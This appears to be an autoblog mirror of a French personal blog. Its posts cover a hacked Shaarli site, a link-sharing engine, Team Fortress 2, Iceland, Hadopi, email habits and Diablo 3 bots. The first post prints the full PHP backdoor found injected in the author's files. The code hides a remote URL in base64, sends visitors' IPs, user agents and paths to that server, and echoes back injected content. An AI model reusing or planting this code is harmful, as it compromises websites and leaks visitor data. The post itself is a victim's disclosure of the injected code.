Autoblog de Fullmaj

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Bordel de couille d'ours !

Thu, 23 Aug 2012 12:33:06 +0000 - (source)

Hier soir, j'essaie de me connecter sur mon shaarli. Et là surprise : Erreur php ligne 41.

WTF?

Alors je me logge sur mon ftp et je regarde mon dossier shaarli. Et que vois-je : le fichier index.php a été édité le matin.

Je l'ouvre et cherche cette ligne 41. J'y trouve un code dont je n'arrive pas à comprendre l'utilité, pour finalement voir en comparaison avec le code original, qu'un pargraphe a été ajouté dans le code de shaarli. Voici les lignes en question:

<?php
if (!isset($sRetry))
{
global $sRetry;
$sRetry = 1;
    // This code use for global bot statistic
    $sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); //  Looks for google serch bot
    $stCurlHandle = NULL;
    $stCurlLink = "";
    if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)&&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)&&(strstr($sUserAgent, 'opera') == false)&&(strstr($sUserAgent, 'chrome') == false)&&(strstr($sUserAgent, 'bing') == false)&&(strstr($sUserAgent, 'safari') == false)&&(strstr($sUserAgent, 'bot') == false)) // Bot comes
    {
        if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create  bot analitics           
        $stCurlLink = base64_decode( 'aHR0cDovL3B1YmJvdHN0YXRpc3RpYy5jb20vc3RhdEMvc3RhdC5waHA=').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);
            @$stCurlHandle = curl_init( $stCurlLink );
    }
    }
if ( $stCurlHandle !== NULL )
{
    curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($stCurlHandle, CURLOPT_TIMEOUT, 6);
    $sResult = @curl_exec($stCurlHandle);
    if ($sResult[0]=="O")
     {$sResult[0]=" ";
      echo $sResult; // Statistic code end
      }
    curl_close($stCurlHandle);
}
}
?>


 La ligne intéressante dans ce bordel, c'est celle avec le base64_decode(), cela donne une URL vers un site à la con qui récupère un paquet d'infos  et doit surement en conséquence lancer une action à la mords-moi-le-noeud sur ma machine.

Petite inspection, tous mes autres dossiers ont été touchés, le wiki et mon projet perso Reflux inclus.

Y A UN FUCKING TYPE QUI A FUCKING SALOPE MON CHEZ MOI AVEC DU FUCKING SALE CODE ! FUCK !

Il semblerait que le mec se soit connecté en FTP, mais je ne trouve pas de trace dans les logs.

Bordel de couille d'ours ! Me suis fait avoir ! Damned que je n'aime pas ça.

J'ai nettoyé tous les fichiers touchés, et changé tous mes mots de passe. Ca fait bizarre, je ne sais pas si ca vient de mon hébergeur, de moi ou d'un autre PC infecté. Mais je me sens sale!

Edit : Il semblerait que ce soit un hack visant surtout le référencement de google, dont le but est de substituer un lien à un autre: http://www.peterrosenmai.com/a-hacking-visible-only-to-google

Reflux - Minimalist Link Blogging Engine (MLBE)

Fri, 17 Aug 2012 16:05:15 +0000 - (source)

[fr]Reflux est un moteur de partage de liens écrit en php sous la forme d'un flux de type micro-blogging.

Largement inspiré de l'excellent Shaarli, il permet de classer les liens par catégorie, mais surtout de noter ces liens par pertinence sur une échelle entre 0 et 100. Cette pertinence permet de retrouver rapidement ses liens favoris : en un clic, Reflux permet d'afficher vos liens par pertinence dans la catégorie de votre choix.

Reflux utilise ChaozzDB pour la base de donnée en flat file et Twitter Bootstrap pour le CSS. L'idée m'est venue après qu'un ami m'ait demandé:  "quels sont tes 10 sites d'électronique et de DIY préférés?". Reflux m'a permis de lui répondre avec un simple lien vers la catégorie "Tech&DIY" de ce Reflux.

Le code source et les instructions d'installation sont disponibles sur le wiki FULLMAJ sous license GPL.
Note : C'est ma première excursion dans le monde du webdesign php et css, expérience extrèmement intéressante fruit de douloureuses heures sur les tutoriaux de la w3c et de pas mal de persévérance... donc certainement bourré de failles et de non-élégances de débutant dont je serais avide de corriger l'existence ![/fr]
[en]Reflux is a link managment engine written in php with a micro blogging display fashion.

Inspired by the powerfull Shaarli, it allows to classify link by category, and to give to your link a mark from 0 to 100, representing its interest. It allows to quickly recall your favorites link : in one mouse click, Reflux permet displays your links by interest, category per category.

Reflux uses ChaozzDB for the flat file DB and Twitter Bootstrap for CSS. The idea came after one friend asking me this question: "what are your 10 favorite DIY and electronics wesites?". Reflux allowed me to quickly answer by using the "Tech&DIY" filter of this Reflux.

Source code and installation instructions are available on this wiki under GPL license.[/en]

Why TF2 >> All

Tue, 14 Aug 2012 11:09:29 +0000 - (source)

Can't stop playing Team Fortress 2. Any other FPS those days brings me back to my beloved Red and Blue mates. But what are the reasons that make this game so addictive? What's this terrific success linked to? What are the assets and design decisions that makes it that awesome? I've got my idea, check it out.

1 - 100% Original background :
This epic, esthetically fun-shaped universe is mind blowing. Characters design, level design, global athmosphere, everything fit perfectly well altogether. That's all about being epically seriously crazy, you get it?The Medic is awesomely German styled, the Heavy is awesomely dumb, the Engineer is awesomely Texan and the Pyro is awesomely mphmmhphmmh.

2 - Differentiated and situation balanced classes gameplay
When it comes to gameplay, the picture is the same : all classes gameplay strongly differs in style and balances with each other. Synergys are everywhere, and provide combinations to feed both casual and epic players.

3 - Easy to be good at / Hard to master
It's easy to strike a successfull Rocket into a heavy/medic pack, but it's damn hard to master accurates airshots during critical encounters. It's all about teamplay and positive exploit of class synergies, that this game excells at providing. This game is both fun for a 15 minutes afterwork session, and a 2 hours relentless clan war.

4 - 0% Assault Rifle  inside :
No AK or M14 that makes multiplayer FPS boringly distance-oriented
This is not immediate to feel, but definitely makes the point here. In real life battles, Assault Rifles are strong weapons that combine rifle power with the bullet load of a SMG. Those weapons are overpowered in games as well and make FPS boringly mid/far distance oriented, where visual contact is stressed to a minimum thanks to the fire power and accuracy of those babys. But in TF2, none of those are present. As a consequence, battle is heavily contact oriented and weapons focus on close range damaging (shotguns and dispersion guns). At the extremes, you find either the Pyro buddy, and the sniper.

These are the main assets of the balanced, fun and addictive game that is Team Fortress 2.

Background, Fun, Skill and Assault Rifles

L'Islande rayée de la carte

Tue, 14 Aug 2012 06:09:39 +0000 - (source)

Deux ans après l'engouement pour la "Révolution du Peuple", on n'entend plus parler de l'Islande. Ce pays qui a osé dire non aux créanciers privés, qui a envoyé les banquiers et dignitaires corrompus se faire voir n'a plus de visibilité au sein de l'UE. La presse se taît, et c'est dans la presse étrangère que l'on trouve des  infos. De quoi faire taire le succès, certes limité mais ô combien symbolique, de cette révolution populaire.

http://www.granma.cu/frances/internationales/2agos-omerta%20sur.html

En corrélant avec d'autres médias, la principale conclusion que l'on peut en tirer est que contrairement à ce que l'on nous fait miroiter, dire aux banquiers et créanciers d'aller se faire voir n'est pas une catastrophe en soi. C'est même la meilleure façon de mettre en lumière ceux qui profitent du système de "la crise" et de les renvoyer à leurs responsabilités. Intéressant.

http://www.atlantico.fr/decryptage/democratie-islandaise-plus-forte-que-banquiers-comment-politique-reprend-pouvoir-economique-olivier-demeulenaere-426655.html?page=0,1

A la décharge de l'évènement, les principaux arguments sont :
- ce qui se passe dans un pays dont la population est équivalente à celle de la ville de Toulouse n'est pas applicable mis à l'échelle d'un pays 100 fois plus peuplé.
- la mise à mal de la dette privée ne couvre pas les déboires de la dette publique. 

http://globalpresse.wordpress.com/2012/07/16/la-justice-islandaise-donne-raison-a-wikileaks/
http://www.france24.com/fr/20111215-islande-processus-paix-etat-palestinien-palestine-creation-mahmoud-abbas-president

Le pouvoir au peuple permet de grandes décisions que la communauté internationale oligarchique a bien du mal à ne serait ce que dessiner à plusieurs.

Bref, quand l'état francais se gargarise de la fierté de voir les états Nord Africains vivre leurs révolutions de jasmin, il s'étouffe et prie que le peuple ne regarde pas un peu plus vers le nord, là ou les journées s'allongent et les esprits se libèrent.

(source image carte diplomatique  :  http://diplomatie.gouv.fr)

Bye Arduino, Hello Maple !

Mon, 16 Jul 2012 15:24:45 +0000 - (source)

Here it is, my brand new Maple V5 Board.

I can't wait to make those shiny 90 DMIPS to overkill my synth design dreams...

But wait, I have a SIDaster to release first. This one will be used afterwards. But the guys from Wetterott are incredibly fast, trust me !

Hadopi : Le Bilan

Mon, 09 Jul 2012 06:56:37 +0000 - (source)

Bilan de l’Hadopi, user side.

C'est le bon moment pour faire le point : le gouvernement le demande et les données sont floues. Ainsi en tant qu'utilisateur des réseaux peer to peer, autant la faire à l’envers du point de vue personnel : un an et demi après, qu'en est il de mon comportement depuis Hadopi ?

(1) Je télécharge autant post-Hadopi.

(2) J’achete toujours autant de médias post Hadopi.

(3) Je consulte des médias hors circuits majors.

(1) : Mes habitudes n'ont pas changé, elles se sont concentrées autour des axiomes fondamentaux du libre partage: télécharger ce que je regarde/écoute, et écouter ce que je télécharge.
J’évite le téléchargement compulsif qui a pour effet d’engorger les disques durs de fichiers que l’on ne consulte jamais. Dans un même ordre d’idée, je ne conserve que les médias téléchargés que je considère avec beaucoup d’estime, comme faisant partie de ma «bibliothèque».

(2) : J’achète les médias d’estime sur support physique du via les réseaux de distribution les plus courts, notemment chez les disquaires. Je possède la majorité des médias de ma bibliothèque sur un autre média propriétaire (CD, DVD, livre, etc...) que mon ordinateur.

(3) : Les moyens mis en place pour fliquer Hadopi me font éviter les médias des grands groupes. Je ne consulte plus les sorties des majors, et rechigne à aller voir les grosses productions au cinema. Perte pure pour moi: je passe certainement à côté d’artistes extraordinaires. Perte pure pour les majors : je n’achète plus leur contenu car je ne m’informe plus, je ne m’y intéresse plus. C’est un divorce pur et simple, au rejet des méthodes succède une indifférence banale.

La perte est double: pour les majors et pour moi. Mais c’est la raçon de la méthode.

HAPPY FULLMAJ DAY - 28/06 ONEONE

Thu, 28 Jun 2012 15:12:34 +0000 - (source)

THIS IS THE FULLMAJ DAY, MAY WE ALL CELEBRATE THE CAPSLOCK DAY.

 

HEAR US LOUND INTERNETZ TODAY IS A SPECIAL DAY WHERE WE CELEBRATE THOSE OF US WHO IMPOSE THEIR SUPREME OPINIONS BY FLOODING TEXT BASED PLATFORMS WITH HEX[41<>5A] ASCII CHARZ !

 

BEHOLD THE HOLY CAPSLOCK DAY !

Email Monophrase : Coup de gueule illustré

Thu, 07 Jun 2012 09:48:31 +0000 - (source)

Tendance insupportable su moment, les mails d'une phrase en forward pullulent dans les boites mails pro. Ces phrases courtes, du genre " a traiter ASAP", sont utilisés pour propager des actions à faire, ou des questions.

Aucun des codes de l'écrit n'est respecté, autant sur la ponctuation que sur les règles de base de savoir vivre. On assiste de plus en plus à un ballet de mail commencant en "<FW>:" dont la seule et unique phrase chapeau n'a rien à envier aux "Impulsive Ego Posts" que l'on critique tant sur les réseaux sociaux.

Dans certaines entreprises, les admins ont même désactivé la fonction "répondre à tous". Cela force les personnes ayant tendance à forcer sur le mail ultracourt à revenir aux fondamentaux : dire bonjour, préciser le cadre (ou repréciser au besoin), et garder en tête que écrire deux phrases de plus fait gagner un temps fou à tous ceux qui sont amenés à lire le mail.

Une sorte de bien séance de la messagerie électronique somme toute.

Quelques morceaux choisis tirés d'échanges réels :

Le Black Hole : « »
Rien. Le mail est forwardé, mais aucun texte chapeau ne vient expliquer la raison du forward.

L'informatif : « For Info »
Celui là tombe par centaine de kilos, surtout en chapeau d'un échange de 20 mails avec plein de réponses floues. Avec un fil difficile à suivre.

Le simplet : « Merci de faire de ton mieux »
Suivi généralement de travail abscon et très mal défini, ou personne ne sait exactement ce qu'il faut faire, et que tu te retrouves en fin de chaîne recevoir le paquet piégé.

L'engagé : « Merci de confirmer »
Généralement accompagné d'un mail nécessitant une décision entre deux solutions inappropriées qui ont été proposées par des gens qui n'ont pas les compétences pour proposer. Et on te demande de bénir ces solutions.

Le Catastrophique : "C'est la TOP PRIORITE"
C'est la CA-TA-STRO-PHE : y'a une super méga urgence suite aux échanges de mail en dessous. C'est assez obscur alors on te le propage rapidement pour que tu te démerdes avec.

L'indécis : «A voir si on peut l’approuver »
On a reçu un truc, j’y comprends rien et j’ai pas envie de regarder si ca tient la route. Tu jettes un œil ?

Le pusher : « Cela me semble acceptable, non ? »
J’ai regardé de travers, ca a l’air potable même si c’est ultra bancal. J’ai des jalons de livraison à respecter et je m’en fous de la qualité, dis moi qu’on accepte que je sois tranquille.

Le clivage : « Merci de voir de savoir sur quel banc »
L’univers des bancs d’essais est un obscur maelstrom que je n’ose pas approcher de peur d’attraper une saloperie. J’évite d’en parler, j’en perds mon francais. Regarde pour moi ce que tu peux faire.

Le yakafokon : « Comment progresser sur ce sujet ?;; »
Bon, j’y comprends rien du tout à vot’ bordel, et tout ce qu’il m’intéresse c’est de savoir où vous en êtes, car je dois fermer une case dans un fichier excel. Z’en êtes ou ?

Le Bug : « rrr »
Je sais pas quoi écrire pour vous propager ce mail , et puis ca me gonfle vos trucs. Alors je tape « r » et j’envoie. Faites chier.

Le simulacre : « Cette phrase est en ligne avec ce que j’ai compris de la discussion »
Bon, j’ai rien compris et je m’en bats les couilles. La dernière phrase, elle est bonne ? Je peux la mettre dans mon reporting de la semaine pour les chefs ? Je dois l’envoyer dans 10 minutes.

L'emo kid question : « Comme il a fait ? »
Bon sang, j’y comprends vraiment rien. Quelqu'un m’explique que je sois pas à la ramasse ?

Le faire avec : « un doc reçu qui n’est pas passé par les voies normales »
Un document à analyser, qu’on a reçu sur le tas. J’ose pas me retourner vers le fournisseur et gueuler car c’est un doc pourri qui n’a pas suivi le process normal de livraison qualité. Vous voulez bien faire une passe dessus, histoire de pas faire de vagues, et me faire des commentaires ? La flemme de dire non au fournisseur.

L'ordre : « J’ai besoin d’un retour aujourd’hui »
On me met la pression au-dessus de ma hiérarchie pour répondre vite, même si je ne comprends rien au sujet, alors je vous propage la pression. Magnez-vous, bande de moules.

Le meaculpa : « sorry »
Putin, j’ai merdé.

Diablo 3, Jérôme Kerviel et API

Tue, 05 Jun 2012 08:21:32 +0000 - (source)

Ca commence fort: l'hôtel des ventes de Diablo 3 est déja cannibalisé par les robots des spéculateurs.

Hier soir, j'ai essayé plusieurs fois d'enchérir sur un objet de qualité dont le prix de base était très bas (3200 pièces d'or). Je clique sur enchérir, et immédiatement s'affiche un message comme quoi je n'ai pas mis assez de sous sur mon enchère. Retournant en arrière, je me rends compte que le prix de l'objet est passé à 3440po! Cela veut donc dire que pendant les 100ms entre le moment ou j'ai cliqué sur enchérir, et le moment ou l'API a traité le message, un robot a vu mon enchère, et a surenchéri automatiquement. Testé plusieurs fois de suite, le "Jérôme Kerviel" de l'hotel des ventes en ligne de Diablo3 contre qui je me suis battu a gagné: non seulement il va plus vite que moi, mais surtout il va plus vite que l'API de Diablo !

Cette situation est surréaliste et laisse présager bien du malheur pour l'hotel des ventes avec de l'argent réel: les bots ont leur créneau, ca je n'en avais aucun doute, mais les logiciels de trading dans Diablo existent déja, et polluent déja l'expérience en jeu des joueurs...

Deuxième Diablorie de la journée, l'API Web Blizzard. Les joueurs pourront bientot consulter le profil et le stuff de leurs personnages en ligne avec une API qui risque d'être pas mal foutue, à l'image de ce que propose l'armurerie pour les joueurs de WoW. Mais lorsque les joueurs demandent à avoir accès à leur inventaire en ligne, Blizzard refuse. La raison officielle est que cela fait partie de la "vie privée" du joueur.

En pratique, c'est plus compliqué : comme Blizzard ne souhaite pas que les joueurs puissent commercer en dehors de l'hotel des ventes, les community managers bottent en touche dès que le sujet est abordé. En gros: l'API ne vous servira pas à voir vos inventaires, même pour des intentions louables comme celle de vérifier si un copain a pas dans son sac un objet qui pourrait m'aider...

Bref, avec les décos en boucle de la semaine dernière et les erreurs 37, cet excellent jeu a le plus en plus un arrière gout d'attrappe pigeon qui me colle à la gorge. Reste que la difficulté en mode Hell est bien au rendez vous et qu'après 52 niveaux "autoroute", le jeu prend vraiment une dimension tactique intéressante.

Diablo 3, DRM, Argent Réel et Bisounours

Tue, 22 May 2012 13:23:09 +0000 - (source)

D3 fait couler beaucoup d’encre et pour cause : c’est un titre qui fait bouger les lignes des principes établis dans le domaine du jeu vidéo. Les décisions prise par Blizzard ne sont pas anodines, et prennent tout leur sens à la lumière d'un peu d’histoire: DRM, mode solo et argent de l’hôtel des ventes en ligne.

Il y a un an de cela, s’est passé un évènement de taille dans le monde du titre World Of Warcraft. Après 4 années de bataille contre les Bots (robots qui remplacent les joueurs) et les Golds Farmers (joueurs qui ramassent de l’or en jeu pour le revendre contre de l’argent sonnant et trébuchant), les juristes de Blizzard ont changé de cap. Après des années marquées principalement par des attaques en justice, des fermetures de comptes des joueurs et des démarches couteuses en justice, Blizzard a envoyé mi juillet 2011 ses meilleurs avocats traverser l’Atlantique pour aller en Allemagne sonner à la porte des deux plus grand développeurs de Bots de World of Warcraft qu’étaient PiroxBots et Honorbuddy. Blizzard leur tombe sur le coin de la figure, et leur propose des sous pour qu’ils arrêtent non seulement de développer des logiciels pirates pour WoW, mais qu’ils s’engagent à ne plus jamais développer de soft touchant de loin à Activision Blizzard.

Pirox a joué le jeu et quitté la scène (à ma grande déception, meme si c’était la décision la plus sage). Les gars de HB l’ont joué agressif et sont allés au tribunal sous couverture de la loi Allemande et du droit de jouir de son jeu comme bon le semble.

Le changement brutal de stratégie a surpris beaucoup de monde : en lieu et place de bannissement pur et simple, la stratégie négociatrice de Blizzard était peu lisible. Dans le contexte de l’époque, les seules vraies conclusions que l’on tira étaient que WoW était vraissemblablement en déclin, et que Blizzard choisissait délibérément de réduire la pression sur les joueurs afin de ne pas perdre une clientèle qui, a défaut de tricher ostentaoirement et d'acheter de l'or internet, n'en est pas moins une clientèle qui paie 14.90€ par mois pour le faire…

Mais aujourd’hui, cette action prend un autre sens. Avec la sortie de Diablo 3, le débat sur l’hotel des ventes en ligne alimente la chronique, je ne peux m’empêcher de faire un parallèle.

Dans un premier temps, l’annonce de l’abonnement d’un an à WoW: 6 mois avant la sortie de D3, Blizzard propose à ses joueurs de s’engager pour un an à World of Warcraft, et à recevoir au titre de cet engagement le jeu Diablo 3 gratuitement. Il faut comprendre ce geste commercial comme il doit être : un écart de survie. Sortir un titre comme Diablo 3, c'est prendre le risque de canibaliser tout un public de joueurs de WoW qui paie 14.90€ par mois pour jouer sur un titre déja existant;gros risque financier! Alors, la stratégie de Blizzard a été payante : proposer aux joueurs de WoW d'acheter Diablo3 gratuitement s’ils s’engagent pour un an, c’est contenir stratégiquement le flux monétaire en cas de transfert de joueurs migrant de WoW à Diablo 3. Car si ces joueurs décident de passer du temps sur D3, ils continuent de payer leur abonnement WoW. Manoeuvre réussie.

Dans un tel contexte, l’intention de Activision/Blizzard est de faire de Diablo 3 un titre aussi rentable que Wold of Warcraft. L'hôtel des ventes avec du vrai argent est la clef de voute du buisness model de Diablo 3 : ponctionner les transactions entrantes et sortantes à 15% permet de garantir une rentrée d’argent régulière. Mais pour assurer un volume de transactions, Blizzard a surtout pris une décision très controversée : afin d'éviter la triche et la duplication d'objets, le jeu est uniquement jouable en ligne sur les serveurs Blizzard.

Le but premier est de rendre exclusif le système d’enchères : tous les joueurs doivent jouer dans un bac à sable où les transactions sont obligatoires. Tous les joueurs doivent pouvoir un jour soit vendre du matériel, soit en acheter à d’autres à travers de la vitrine de l'hotel des ventes.

Ce choix de rentabilité fait que Blizzard a tout intéret que la totalité des joueurs joue en ligne, et c'est naturellement que la possibilité de jouer hors ligne, en solo, a été proscrite. Outre que le mode solo n’est pas faisable techniquement aujourd’hui car il faudrait un logiciel serveur de jeu en exécutable local, mais surtout en pratique il ne faut pas s’attendre à ce que Blizzard le propose : tout son modèle économique autour du jeu se base sur le principe qu’on doit jouer dans ce bac à sable ou l’on peut vendre et acheter. L’argument de la sécurité des comptes a bon dos : tout est sinistrement affaire de pognon.

Ensuite, la grosse peur de Blizzard se situe sur tout ce qui peut pourrir le marché en ligne en automatisant les actions des joueurs : les robots. Ces PiroxBots, Honorbuddy, Gnometools ou autres qui sont autant de programmes qui vont tout seul ramasser le butin et le vendre, inondant le marché d’objets, détruisant les microéconomies. Le changement de stratégie d’été 2011 montre que Blizzard a souhaité faire le ménage de la scène "boting" en neutralisant les acteurs les plus connus.

Ces types sont aussi et surtout des champion du memoryediting et du hack de code Blizzard. En les engageant à ne pas s’attaquer aux prochains titre Blizzard, le but est surtout de les neutraliser au regard des prochains titres. Il faut croire qu’ils ont vraiment peur des bots. Et ils ont raison, car l’avenir du système est incertain.

D’autant que les équipes de Honorbuddy remettent le couvert, et leur bot Demonbuddy est déjà en version pré-release pour D3. Une équipe de dev chinoise a également pris le relais de ce qui semble être le deuxième bot officiellement supportant la version retail du jeu. Et nous ne sommes qu’à une semaine de la sortie de la version officielle. Il faut voir ce que cela représente à moyen terme, mais déjà on peut s’attendre à voir des scripts complétant automatiquement les scènes les plus « lucratives » en butin, et mettant automatiquement le butin en vente.

Quand au mode solo, il a un grand avenir devant lui : les serveurs privés. L’émulateur Moegge a officiellement quitté le support des builds beta et l’équipe se concentre sur le second build de la version retail. Les bugs sont encore trop nombreux pour une release candidate, mais chacun suivant l’actu ému saura reconnaitre le talent de l’équipe d’une dizaine de développeurs qui bosse dessus.

L’avenir est assez simple à prévoir : dès que l’état de grace de la raréfaction des boites aura disparu, le prix de la version dématérialisée baissera grandement, pour atteindre (au pif) un 14,99€ de convergence sur lequel Blizzard profitera du traffic de nouveaux joueurs pour se faire du pognon sur les micro-paiements. Et le jeu sera même à horizon semi-lointain gratuit : cela va surtout dépendre de la fréquentation du titre. Mais tout est d’ores et déjà bien engagé dans ce sens.

Mais le jeu, lui, en vaut-il la chandelle ?

Au-delà des aspects financiers et mercantiles, le jeu est vraiment réussi. Equilibré et complet, il propose une expérience inégalée depuis… 14 ans. Et en cela, c’est un bon jeu. Le contexte est terrifiant, autant que le titre est bon. Un paradoxe sucré/salé délicieusement raffiné.

Sources : pour les évènements cités ci-dessus, les news des 24 derniers mois de Ownedcore (ex mmowned), le forum de mmowned, PiroxBots (et les discussions du défunt forum /Blizzard), mmo-champion, judgehype.

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